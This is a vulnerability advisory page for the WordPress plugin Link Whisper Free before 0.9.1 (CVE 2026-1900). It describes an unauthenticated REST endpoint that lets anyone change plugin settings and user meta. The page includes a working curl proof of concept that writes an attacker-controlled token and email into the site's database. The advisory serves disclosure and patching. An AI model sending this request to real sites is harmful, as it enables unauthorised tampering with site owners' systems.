Link Whisper Free < 0.9.1 – Unauthenticated Settings and User Meta Update | CVE 2026-1900 | Plugin Vulnerabilities

Description

The plugin has a publicly accessible REST endpoint that allows unauthenticated settings updates.

Proof of Concept

```
curl -X POST "https://wp.ddev.site/wp-json/link-whisper/ai-auth" \
  -d "access_token=ai-malicious123" \
  -d "user_id=attacker_controlled" \
  -d "uid=1" \
  -d "uemail=attacker@evil.com" \
  -H "Content-Type: application/x-www-form-urlencoded"
```

Expected Response: "ok"

Verification 

The following database entries will be created/modified:

- wp_options: wpil_ai_access_authorized=1, wpil_ai_access_user_email=attacker@evil.com
- wp_usermeta: user_id=1, meta_key=wpil_ai_access_user_email, meta_value=attacker@evil.com

Affects Plugins

Fixed in 0.9.1

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

yiğit ibrahim sağlam

Submitter

yiğit ibrahim sağlam

Submitter website

https://ibrahimsql.com

Submitter twitter

Verified

Yes

WPVDB ID

dc10b627-7981-4c53-bc9d-e87418f3fcfc

Timeline

Publicly Published

2026-03-17 (about 21 days ago)

Added

2026-03-17 (about 20 days ago)

Last Updated

2026-03-17 (about 20 days ago)

Other

Published

Title

Published

2025-09-30

Title

SMS Contact Form 7 Notifications by ClickSend <= 1.4.0 - Missing Authorization

Published

2025-04-01

Title

ShipDepot for WooCommerce <= 1.2.19 - Missing Authorization

Published

2024-06-05

Title

Countdown, Coming Soon, Maintenance – Countdown & Clock < 2.7.8.1 - Missing Authorization to Authenticated (Subscriber+) PHP Object Injection

Published

2026-01-16

Title

Community Events < 1.5.7 - Missing Authorization to Unauthenticated Arbitrary Event Approval via 'eventlist' Parameter

Published

2024-10-13

Title

ShortPixel Image Optimizer < 5.6.4 - Missing Authorization